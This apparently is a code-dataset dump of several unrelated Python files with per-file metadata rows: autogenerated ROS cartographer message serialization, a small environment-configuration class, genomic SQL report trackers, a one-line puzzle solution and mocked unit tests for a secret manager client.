self.options.odom_frame = str[start:end]
_x = self
start = end
end += 61
(_x.options.provide_odom_frame, _x.options.use_odometry, _x.options.use_nav_sat, _x.options.use_landmarks, _x.options.publish_frame_projected_to_2d, _x.options.num_laser_scans, _x.options.num_multi_echo_laser_scans, _x.options.num_subdivisions_per_laser_scan, _x.options.num_point_clouds, _x.options.rangefinder_sampling_ratio, _x.options.odometry_sampling_ratio, _x.options.fixed_frame_pose_sampling_ratio, _x.options.imu_sampling_ratio, _x.options.landmarks_sampling_ratio,) = _get_struct_5B4i5d().unpack(str[start:end])
self.options.provide_odom_frame = bool(self.options.provide_odom_frame)
self.options.use_odometry = bool(self.options.use_odometry)
self.options.use_nav_sat = bool(self.options.use_nav_sat)
self.options.use_landmarks = bool(self.options.use_landmarks)
self.options.publish_frame_projected_to_2d = bool(self.options.publish_frame_projected_to_2d)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.trajectory_builder_options_proto = str[start:end].decode('utf-8')
else:
self.options.trajectory_builder_options_proto = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.laser_scan_topic = str[start:end].decode('utf-8')
else:
self.topics.laser_scan_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.multi_echo_laser_scan_topic = str[start:end].decode('utf-8')
else:
self.topics.multi_echo_laser_scan_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.point_cloud2_topic = str[start:end].decode('utf-8')
else:
self.topics.point_cloud2_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.imu_topic = str[start:end].decode('utf-8')
else:
self.topics.imu_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.odometry_topic = str[start:end].decode('utf-8')
else:
self.topics.odometry_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.nav_sat_fix_topic = str[start:end].decode('utf-8')
else:
self.topics.nav_sat_fix_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.landmark_topic = str[start:end].decode('utf-8')
else:
self.topics.landmark_topic = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_5B4i5d = None
def _get_struct_5B4i5d():
global _struct_5B4i5d
if _struct_5B4i5d is None:
_struct_5B4i5d = struct.Struct("<5B4i5d")
return _struct_5B4i5d
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from cartographer_ros_msgs/StartTrajectoryResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import cartographer_ros_msgs.msg
class StartTrajectoryResponse(genpy.Message):
_md5sum = "a14602d76d9b734b374a25be319cdbe9"
_type = "cartographer_ros_msgs/StartTrajectoryResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """cartographer_ros_msgs/StatusResponse status
int32 trajectory_id
================================================================================
MSG: cartographer_ros_msgs/StatusResponse
# Copyright 2018 The Cartographer Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# A common message type to indicate the outcome of a service call.
uint8 code
string message
"""
__slots__ = ['status','trajectory_id']
_slot_types = ['cartographer_ros_msgs/StatusResponse','int32']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
status,trajectory_id
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(StartTrajectoryResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.status is None:
self.status = cartographer_ros_msgs.msg.StatusResponse()
if self.trajectory_id is None:
self.trajectory_id = 0
else:
self.status = cartographer_ros_msgs.msg.StatusResponse()
self.trajectory_id = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
buff.write(_get_struct_B().pack(self.status.code))
_x = self.status.message
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_get_struct_i().pack(self.trajectory_id))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.status is None:
self.status = cartographer_ros_msgs.msg.StatusResponse()
end = 0
start = end
end += 1
(self.status.code,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.status.message = str[start:end].decode('utf-8')
else:
self.status.message = str[start:end]
start = end
end += 4
(self.trajectory_id,) = _get_struct_i().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
buff.write(_get_struct_B().pack(self.status.code))
_x = self.status.message
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_get_struct_i().pack(self.trajectory_id))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.status is None:
self.status = cartographer_ros_msgs.msg.StatusResponse()
end = 0
start = end
end += 1
(self.status.code,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.status.message = str[start:end].decode('utf-8')
else:
self.status.message = str[start:end]
start = end
end += 4
(self.trajectory_id,) = _get_struct_i().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_i = None
def _get_struct_i():
global _struct_i
if _struct_i is None:
_struct_i = struct.Struct("<i")
return _struct_i
_struct_B = None
def _get_struct_B():
global _struct_B
if _struct_B is None:
_struct_B = struct.Struct("<B")
return _struct_B
class StartTrajectory(object):
_type = 'cartographer_ros_msgs/StartTrajectory'
_md5sum = 'bed83613a1da70f1e83eafd765dad59d'
_request_class = StartTrajectoryRequest
_response_class = StartTrajectoryResponse
| 37.035862
| 528
| 0.658821
| 3,687
| 26,851
| 4.562246
| 0.070518
| 0.062779
| 0.051008
| 0.043755
| 0.89739
| 0.886689
| 0.885144
| 0.875275
| 0.875275
| 0.875275
| 0
| 0.014878
| 0.219024
| 26,851
| 724
| 529
| 37.087017
| 0.787268
| 0.090984
| 0
| 0.862069
| 1
| 0
| 0.172013
| 0.045451
| 0
| 0
| 0.000833
| 0
| 0
| 1
| 0.027915
| false
| 0
| 0.013136
| 0
| 0.090312
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
22366428693ae275acb01db69ab820da721b2896
| 360
|
py
|
Python
|
adversarial_env/configuration.py
|
TorchPAIRED/TorchPAIRED
|
0b9b9ef13f9029d23682ed4752ea775230b49eb6
|
[
"MIT"
] | null | null | null |
adversarial_env/configuration.py
|
TorchPAIRED/TorchPAIRED
|
0b9b9ef13f9029d23682ed4752ea775230b49eb6
|
[
"MIT"
] | null | null | null |
adversarial_env/configuration.py
|
TorchPAIRED/TorchPAIRED
|
0b9b9ef13f9029d23682ed4752ea775230b49eb6
|
[
"MIT"
] | null | null | null |
class EnvConfiguration:
def __init__(self, encoding, agent_pos, agent_dir, goal_pos, carrying):
self.encoding, self.agent_pos, self.agent_dir, self.goal_pos, self.carrying = encoding, agent_pos, agent_dir, goal_pos, carrying
def get_configuration(self):
return self.encoding, self.agent_pos, self.agent_dir, self.goal_pos, self.carrying
| 72
| 136
| 0.761111
| 52
| 360
| 4.942308
| 0.269231
| 0.124514
| 0.124514
| 0.163424
| 0.762646
| 0.762646
| 0.762646
| 0.762646
| 0.459144
| 0.459144
| 0
| 0
| 0.141667
| 360
| 5
| 137
| 72
| 0.831715
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
223efc84a0bc36ff2dc6d3d1c2c0a7d89c8a7da2
| 96
|
py
|
Python
|
yeast/core/media/sd/__init__.py
|
irahorecka/sga-fba
|
fc7e923da8e79555780359f018c85b5e5339d8d0
|
[
"MIT"
] | null | null | null |
yeast/core/media/sd/__init__.py
|
irahorecka/sga-fba
|
fc7e923da8e79555780359f018c85b5e5339d8d0
|
[
"MIT"
] | null | null | null |
yeast/core/media/sd/__init__.py
|
irahorecka/sga-fba
|
fc7e923da8e79555780359f018c85b5e5339d8d0
|
[
"MIT"
] | null | null | null |
from yeast.core.media.sd.base import sd
from yeast.core.media.sd.sdszappanos import sdszappanos
| 32
| 55
| 0.833333
| 16
| 96
| 5
| 0.5
| 0.225
| 0.325
| 0.45
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 96
| 2
| 56
| 48
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
97d4e4a86daba51fb3e5c6b79b4b3ab6c7f537a8
| 11,125
|
py
|
Python
|
CGATPipelines/pipeline_docs/pipeline_proj007/trackers/macs_replicated_interval_associations.py
|
cdrakesmith/CGATPipelines
|
3c94ae4f9d87d51108255dc405c4b95af7c8b694
|
[
"MIT"
] | 49
|
2015-04-13T16:49:25.000Z
|
2022-03-29T10:29:14.000Z
|
CGATPipelines/pipeline_docs/pipeline_proj007/trackers/macs_replicated_interval_associations.py
|
cdrakesmith/CGATPipelines
|
3c94ae4f9d87d51108255dc405c4b95af7c8b694
|
[
"MIT"
] | 252
|
2015-04-08T13:23:34.000Z
|
2019-03-18T21:51:29.000Z
|
CGATPipelines/pipeline_docs/pipeline_proj007/trackers/macs_replicated_interval_associations.py
|
cdrakesmith/CGATPipelines
|
3c94ae4f9d87d51108255dc405c4b95af7c8b694
|
[
"MIT"
] | 22
|
2015-05-21T00:37:52.000Z
|
2019-09-25T05:04:27.000Z
|
from cpgReport import *
from CGATReport.Tracker import *
from CGATReport.odict import OrderedDict as odict
from macs_annotations import *
##########################################################################
class replicatedAssociationsHierarchy(cpgTracker):
""" """
pattern = "(.*)_replicated_intervals$"
def __call__(self, track, slice=None):
ANNOTATIONS_NAME = P['annotations_name']
statement = """SELECT count(distinct interval_id) as NMIs, feature_class
FROM (
SELECT interval_id,
CASE WHEN coding_tss > 0 THEN 'Protein-coding gene TSS'
WHEN lincrna_tss > 0 THEN 'lncRNA gene TSS'
WHEN short_rna_tss > 0 THEN 'short RNA TSS'
WHEN pseudogene_tss > 0 THEN 'Pseudogene TSS'
WHEN processed_transcript_tss > 0 THEN 'Processed transcript TSS'
WHEN enhancer >0 THEN 'Enhancer (H3K4Me1)'
WHEN rnaseq >0 THEN 'Novel RNAseq transcript TSS'
ELSE 'Intergenic'
END AS feature_class FROM (
SELECT i.interval_id, a.coding_tss, b.lincrna_tss, c.short_rna_tss, d.pseudogene_tss, e.processed_transcript_tss, f.enhancer, g.rnaseq FROM %(track)s_replicated_intervals i
left join
(SELECT distinct gene_id, 1 as coding_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_overlap
where (genes_nover>0 OR downstream_flank_nover>0 OR upstream_flank_nover>0) ) a
on a.gene_id=i.interval_id
left join
(SELECT distinct gene_id, 1 as lincrna_tss
FROM %(track)s_replicated_lncrna_tss_distance
where closest_dist < 1000) b
on i.interval_id=b.gene_id
left join
(SELECT distinct n.gene_id as gene_id, 1 as short_rna_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_noncoding_tss_distance n,
annotations.transcript_info t, %(track)s_replicated_%(ANNOTATIONS_NAME)s_interval_noncoding_mapping m
where n.gene_id=m.interval_id
AND m.gene_id=t.gene_id
AND t.gene_biotype IN ("miRNA","snRNA","snoRNA","rRNA")
AND n.closest_dist < 1000) c
on i.interval_id=c.gene_id
left join
(SELECT distinct n.gene_id as gene_id, 1 as pseudogene_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_noncoding_tss_distance n,
annotations.transcript_info t, %(track)s_replicated_%(ANNOTATIONS_NAME)s_interval_noncoding_mapping m
where n.gene_id=m.interval_id
AND m.gene_id=t.gene_id
AND t.gene_biotype="pseudogene"
AND n.closest_dist < 1000) d
on i.interval_id=d.gene_id
left join
(SELECT distinct n.gene_id as gene_id, 1 as processed_transcript_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_noncoding_tss_distance n,
annotations.transcript_info t, %(track)s_replicated_%(ANNOTATIONS_NAME)s_interval_noncoding_mapping m
where n.gene_id=m.interval_id
AND m.gene_id=t.gene_id
AND t.gene_biotype="processed_transcript"
AND n.closest_dist < 1000) e
on i.interval_id=e.gene_id
left join
(SELECT distinct interval_id, 1 as enhancer
FROM %(track)s_replicated_h3k4me1_intervals) f
on i.interval_id=f.interval_id
left join
(SELECT distinct gene_id, 1 as rnaseq
FROM %(track)s_replicated_rnaseq_tss_distance
WHERE closest_dist < 1000) g
on i.interval_id=g.gene_id))
group by feature_class
order by feature_class asc;""" % locals()
data = self.getAll(statement)
return data
##########################################################################
class replicatedAssociationsHierarchy3(cpgTracker):
""" """
pattern = "(.*)_replicated_intervals$"
def __call__(self, track, slice=None):
ANNOTATIONS_NAME = P['annotations_name']
statement = """SELECT count(distinct interval_id) as NMIs, feature_class
FROM (
SELECT interval_id,
CASE WHEN coding_tss > 0 THEN 'Protein-coding gene TSS'
WHEN lincrna_tss > 0 THEN 'lncRNA gene TSS'
WHEN short_rna_tss > 0 THEN 'short RNA TSS'
WHEN enhancer >0 THEN 'Enhancer (H3K4Me1)'
WHEN rnaseq >0 THEN 'Novel RNAseq transcript TSS'
ELSE 'Intergenic'
END AS feature_class FROM (
SELECT i.interval_id, a.coding_tss, b.lincrna_tss, c.short_rna_tss, f.enhancer, g.rnaseq FROM %(track)s_replicated_intervals i
left join
(SELECT distinct gene_id, 1 as coding_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_overlap
where (genes_nover>0 OR downstream_flank_nover>0 OR upstream_flank_nover>0) ) a
on a.gene_id=i.interval_id
left join
(SELECT distinct gene_id, 1 as lincrna_tss
FROM %(track)s_replicated_lncrna_tss_distance
where closest_dist < 1000) b
on i.interval_id=b.gene_id
left join
(SELECT distinct n.gene_id as gene_id, 1 as short_rna_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_noncoding_tss_distance n,
annotations.transcript_info t, %(track)s_replicated_%(ANNOTATIONS_NAME)s_interval_noncoding_mapping m
where n.gene_id=m.interval_id
AND m.gene_id=t.gene_id
AND t.gene_biotype IN ("miRNA","snRNA","snoRNA","rRNA")
AND n.closest_dist < 1000) c
on i.interval_id=c.gene_id
left join
(SELECT distinct interval_id, 1 as enhancer
FROM %(track)s_replicated_h3k4me1_intervals) f
on i.interval_id=f.interval_id
left join
(SELECT distinct gene_id, 1 as rnaseq
FROM %(track)s_replicated_rnaseq_tss_distance
WHERE closest_dist < 1000) g
on i.interval_id=g.gene_id))
group by feature_class
order by feature_class asc;""" % locals()
data = self.getAll(statement)
return data
##########################################################################
class replicatedAssociationsHierarchy2(cpgTracker):
""" """
pattern = "(.*)_replicated_intervals$"
def __call__(self, track, slice=None):
ANNOTATIONS_NAME = P['annotations_name']
statement = """SELECT count(distinct interval_id) as NMIs, feature_class
FROM (
SELECT interval_id,
CASE WHEN coding_tss > 0 THEN 'Protein-coding gene TSS'
WHEN noncoding_tss > 0 THEN 'Non-coding gene TSS'
ELSE 'Intergenic'
END AS feature_class FROM (
SELECT i.interval_id, a.coding_tss, b.noncoding_tss
FROM %(track)s_replicated_intervals i
left join
(SELECT distinct gene_id, 1 as coding_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_overlap
where (genes_nover>0 OR downstream_flank_nover>0 OR upstream_flank_nover>0) ) a
on a.gene_id=i.interval_id
left join
(SELECT distinct gene_id, 1 as noncoding_tss
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_noncoding_tss_distance
where closest_dist < 1000) b
on i.interval_id=b.gene_id))
group by feature_class
order by feature_class asc;""" % locals()
data = self.getAll(statement)
return data
##########################################################################
class replicatedAssociations(cpgTracker):
""" """
pattern = "(.*)_replicated_intervals$"
def __call__(self, track, slice=None):
ANNOTATIONS_NAME = P['annotations_name']
try:
data1 = self.getValue("""SELECT count(distinct gene_id) as intervals
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_overlap
where (genes_nover>0 OR downstream_flank_nover>0 OR upstream_flank_nover>0)""" % locals() )
except:
data1 = "0"
try:
data2 = self.getValue("""SELECT count(distinct gene_id) as intervals
FROM %(track)s_replicated_%(ANNOTATIONS_NAME)s_noncoding_tss_distance
where closest_dist < 1000""" % locals() )
except:
data2 = "0"
try:
data3 = self.getValue("""SELECT distinct count(distinct interval_id) as intervals, "enhancer" as feature_class
FROM %(track)s_replicated_h3k4me1_intervals""" % locals() )
except:
data3 = "0"
try:
data4 = self.getValue("""SELECT count(distinct gene_id) as intervals
FROM %(track)s_replicated_rnaseq_tss_distance
where closest_dist < 1000""" % locals() )
except:
data4 = "0"
try:
data5 = self.getValue("""SELECT count(distinct gene_id) as intervals
FROM %(track)s_replicated_lncrna_tss_distance
where closest_dist < 1000""" % locals() )
except:
data5 = "0"
return odict(list(zip(("Protein-coding TSS", "Non-coding TSS", "H3K4Me1 Enhancer", "RNAseq transcript", "lincRNA TSS"), (data1, data2, data3, data4, data5))))
| 51.744186
| 197
| 0.513258
| 1,158
| 11,125
| 4.657168
| 0.098446
| 0.048952
| 0.077137
| 0.081587
| 0.864269
| 0.852587
| 0.842017
| 0.842017
| 0.835342
| 0.835342
| 0
| 0.019022
| 0.395146
| 11,125
| 214
| 198
| 51.985981
| 0.782434
| 0
| 0
| 0.78771
| 0
| 0.011173
| 0.845662
| 0.215813
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022346
| false
| 0
| 0.022346
| 0
| 0.111732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
97e873d26fd4e4e1f975c8c00a58feca5964fd2d
| 84
|
py
|
Python
|
pyspectools/models/__init__.py
|
aowen-uwmad/PySpecTools
|
3fd0b68352910df1e653370797a8edd46d92fa1c
|
[
"MIT"
] | 22
|
2018-03-14T10:44:17.000Z
|
2022-01-10T15:02:37.000Z
|
pyspectools/models/__init__.py
|
aowen-uwmad/PySpecTools
|
3fd0b68352910df1e653370797a8edd46d92fa1c
|
[
"MIT"
] | 21
|
2019-07-27T01:43:50.000Z
|
2021-11-15T14:57:15.000Z
|
pyspectools/models/__init__.py
|
aowen-uwmad/PySpecTools
|
3fd0b68352910df1e653370797a8edd46d92fa1c
|
[
"MIT"
] | 3
|
2020-08-03T16:22:00.000Z
|
2021-11-01T15:31:55.000Z
|
from pyspectools.models import classes
from pyspectools.models import torch_models
| 21
| 43
| 0.869048
| 11
| 84
| 6.545455
| 0.545455
| 0.416667
| 0.583333
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 84
| 3
| 44
| 28
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3f0a33656987ca637cb8ea3d9ca1d4411c07e876
| 86
|
py
|
Python
|
ACM-Solution/TRGRID.py
|
wasi0013/Python-CodeBase
|
4a7a36395162f68f84ded9085fa34cc7c9b19233
|
[
"MIT"
] | 2
|
2016-04-26T15:40:40.000Z
|
2018-07-18T10:16:42.000Z
|
ACM-Solution/TRGRID.py
|
wasi0013/Python-CodeBase
|
4a7a36395162f68f84ded9085fa34cc7c9b19233
|
[
"MIT"
] | 1
|
2016-04-26T15:44:15.000Z
|
2016-04-29T14:44:40.000Z
|
ACM-Solution/TRGRID.py
|
wasi0013/Python-CodeBase
|
4a7a36395162f68f84ded9085fa34cc7c9b19233
|
[
"MIT"
] | 1
|
2018-10-02T16:12:19.000Z
|
2018-10-02T16:12:19.000Z
|
exec("n,m=map(int,input().split());print(['LR'[n%2],'UD'[m%2]][n>m]);"*int(input()))
| 43
| 85
| 0.523256
| 18
| 86
| 2.5
| 0.611111
| 0.088889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02381
| 0.023256
| 86
| 1
| 86
| 86
| 0.511905
| 0
| 0
| 0
| 0
| 1
| 0.741176
| 0.741176
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
3f63edc10e21f92e3052123ff38f0b2488e68532
| 63
|
py
|
Python
|
q2_itsxpress/__init__.py
|
kweber1/ITSxpress-qiime2
|
a2a2e7bc12fecd27319f0ab705a78e54a3a926d3
|
[
"CC0-1.0"
] | 8
|
2018-07-12T21:40:50.000Z
|
2021-12-06T01:52:14.000Z
|
q2_itsxpress/__init__.py
|
kweber1/ITSxpress-qiime2
|
a2a2e7bc12fecd27319f0ab705a78e54a3a926d3
|
[
"CC0-1.0"
] | 8
|
2018-07-26T14:45:23.000Z
|
2022-01-24T15:23:41.000Z
|
q2_itsxpress/__init__.py
|
kweber1/q2_itsxpress
|
a2a2e7bc12fecd27319f0ab705a78e54a3a926d3
|
[
"CC0-1.0"
] | 3
|
2019-02-25T19:52:14.000Z
|
2022-03-29T14:14:09.000Z
|
import q2_itsxpress._itsxpress
import q2_itsxpress.plugin_setup
| 31.5
| 32
| 0.920635
| 9
| 63
| 6
| 0.555556
| 0.296296
| 0.62963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0.047619
| 63
| 2
| 32
| 31.5
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3f6bf45199adf5640ba7629b31d68fd52f19bff1
| 196
|
py
|
Python
|
tests/func/multipoint/__init__.py
|
phuntimes/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | 1
|
2020-11-26T05:58:23.000Z
|
2020-11-26T05:58:23.000Z
|
tests/func/multipoint/__init__.py
|
Sean-McVeigh/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | null | null | null |
tests/func/multipoint/__init__.py
|
Sean-McVeigh/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from mongoshapes import MultiPoint as GeoShape
from mongoshapes import MultiPointDict as GeoDict
from mongoshapes import MultiPointField as GeoField
| 28
| 51
| 0.795918
| 25
| 196
| 6.24
| 0.68
| 0.288462
| 0.403846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005882
| 0.132653
| 196
| 6
| 52
| 32.666667
| 0.911765
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3f71ad804cc87bc731c3ba147654ada08e6d1b27
| 25,531
|
py
|
Python
|
tests/unit/gapic/v1/test_secret_manager_service_client_v1.py
|
busunkim96/python-secret-manager
|
54dca6c3d8943a6455fe0d68c094683ed1e32f3e
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/v1/test_secret_manager_service_client_v1.py
|
busunkim96/python-secret-manager
|
54dca6c3d8943a6455fe0d68c094683ed1e32f3e
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/v1/test_secret_manager_service_client_v1.py
|
busunkim96/python-secret-manager
|
54dca6c3d8943a6455fe0d68c094683ed1e32f3e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import mock
import pytest
from google.cloud import secretmanager_v1
from google.cloud.secretmanager_v1.proto import resources_pb2
from google.cloud.secretmanager_v1.proto import service_pb2
from google.iam.v1 import iam_policy_pb2
from google.iam.v1 import policy_pb2
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self, method, request_serializer=None, response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestSecretManagerServiceClient(object):
def test_list_secrets(self):
# Setup Expected Response
next_page_token = ""
total_size = 705419236
secrets_element = {}
secrets = [secrets_element]
expected_response = {
"next_page_token": next_page_token,
"total_size": total_size,
"secrets": secrets,
}
expected_response = service_pb2.ListSecretsResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
parent = client.project_path("[PROJECT]")
paged_list_response = client.list_secrets(parent)
resources = list(paged_list_response)
assert len(resources) == 1
